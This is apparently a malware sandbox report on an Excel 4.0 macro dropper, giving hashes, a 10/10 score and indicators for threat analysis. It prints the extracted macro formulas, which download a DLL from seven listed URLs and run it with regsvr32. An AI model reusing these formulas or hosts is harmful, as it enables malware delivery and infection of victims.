Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    c9355cfd13bd7ec589f5bdebd64652c934afc6aa00188f0866b2ea508cffb797

  • Size

    21KB

  • Sample

    241111-1x8dps1laq

  • MD5

    f73be5787c3b5a01d5afe4048c3affa0

  • SHA1

    1c36e605b05994d4fe3bed5ddf2f262e0c94f2f4

  • SHA256

    c9355cfd13bd7ec589f5bdebd64652c934afc6aa00188f0866b2ea508cffb797

  • SHA512

    7c749c5718a146587335af5d1a52bc1af614d381feda4c90c7fe74810681df54536312563c6e74d3f535aaaeb2b84c8871ba46d388c17f0b632a422ccd2e30fa

  • SSDEEP

    384:H3uAi/NjIVRS8EibbwBlw75SYrLb5CzgObff9kC+xbX74eII:bsNs/zXtFCBn9kC+xbL42

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://www.almoeqatar.com/cgi-bin/3g/

http://www.ayelet.info/wp-admin/oHRoG0X9ubuNtQ/

http://www.lavameapp.com.ar/slide-images/7bzQevDGMld/

http://lista33rivera.uy/wp-content/jiBtjSaJMcM/

http://cenaf.com.co/error/TpewL/

http://pusatbahasa.unsyiah.ac.id/backup/qWzXJpGddclh4zZjt/

http://baykusoglu.com.tr/wp-admin/317Sz3wZsYmAAmmL6/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.almoeqatar.com/cgi-bin/3g/","..\rfs.dll",0,0) =IF('PCWV'!G13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ayelet.info/wp-admin/oHRoG0X9ubuNtQ/","..\rfs.dll",0,0)) =IF('PCWV'!G15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.lavameapp.com.ar/slide-images/7bzQevDGMld/","..\rfs.dll",0,0)) =IF('PCWV'!G17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://lista33rivera.uy/wp-content/jiBtjSaJMcM/","..\rfs.dll",0,0)) =IF('PCWV'!G19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://cenaf.com.co/error/TpewL/","..\rfs.dll",0,0)) =IF('PCWV'!G21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://pusatbahasa.unsyiah.ac.id/backup/qWzXJpGddclh4zZjt/","..\rfs.dll",0,0)) =IF('PCWV'!G23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://baykusoglu.com.tr/wp-admin/317Sz3wZsYmAAmmL6/","..\rfs.dll",0,0)) =IF('PCWV'!G25<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://www.almoeqatar.com/cgi-bin/3g/

xlm40.dropper

http://www.ayelet.info/wp-admin/oHRoG0X9ubuNtQ/

xlm40.dropper

http://www.lavameapp.com.ar/slide-images/7bzQevDGMld/

xlm40.dropper

http://lista33rivera.uy/wp-content/jiBtjSaJMcM/

xlm40.dropper

http://cenaf.com.co/error/TpewL/

Targets

    • Target

      c9355cfd13bd7ec589f5bdebd64652c934afc6aa00188f0866b2ea508cffb797

    • Size

      21KB

    • MD5

      f73be5787c3b5a01d5afe4048c3affa0

    • SHA1

      1c36e605b05994d4fe3bed5ddf2f262e0c94f2f4

    • SHA256

      c9355cfd13bd7ec589f5bdebd64652c934afc6aa00188f0866b2ea508cffb797

    • SHA512

      7c749c5718a146587335af5d1a52bc1af614d381feda4c90c7fe74810681df54536312563c6e74d3f535aaaeb2b84c8871ba46d388c17f0b632a422ccd2e30fa

    • SSDEEP

      384:H3uAi/NjIVRS8EibbwBlw75SYrLb5CzgObff9kC+xbX74eII:bsNs/zXtFCBn9kC+xbL42

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks